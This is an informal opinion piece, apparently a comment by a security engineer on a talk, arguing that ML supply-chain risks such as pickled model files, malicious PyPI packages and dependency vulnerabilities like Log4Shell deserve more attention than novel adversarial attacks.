As a security engineer, I found this talk interesting. It pushes for something that I agree with: the focus of ML security in research papers is primarily on novel adversarial attacks, but there are an incredible number of attacks on the supply chain aspect of training models that are often overlooked. The attacks from the papers are relevant but might require varying levels of attacker access to the system (ex., needing to observe model weights or inference confidence isn’t always immediately accessible to an attacker). Models trained off of public datasets or models are at risk of several attacks from the papers as the model weights of the base model are more known, and adversarial attacks can be performed offline.
From my perspective, ML pipelines are pretty terrifying in application security. Trained models are shared around as pickled Python classes, a file format that can execute code when loaded in another process. Over the past 4 years, I have been researching open-source dependencies, and I am concerned about the amount of malware in the Pypi registry. ML is built on packages like pytorch, which have already been targeted. Since the ML pipeline spans many languages, vulnerabilities in other languages also apply. Log4Shell affected a ubiquitous Java logging library with a perfect 10 severity. An ML pipeline consists of many parts, and influencing or obtaining the model is of high value for an attacker.
Controlling an AI’s reasoning is a powerful capability. We are on the cusp of a wide distribution of ML models, with very little preparedness to prevent vulnerabilities in core components of the pipeline and distribution. It is important to note that models are like reprogrammable programs. We are improving our ability to reverse engineer them. Identifying and triggering “code paths” that result in attacker-controlled behavior is a security vulnerability.
With more ML decisions being made in critical systems. It is imperative to have a holistic view of security as it relates to ML. A model’s reliability is only as reliable as the data and training that builds it. And if you can’t trust them, then ur hacked.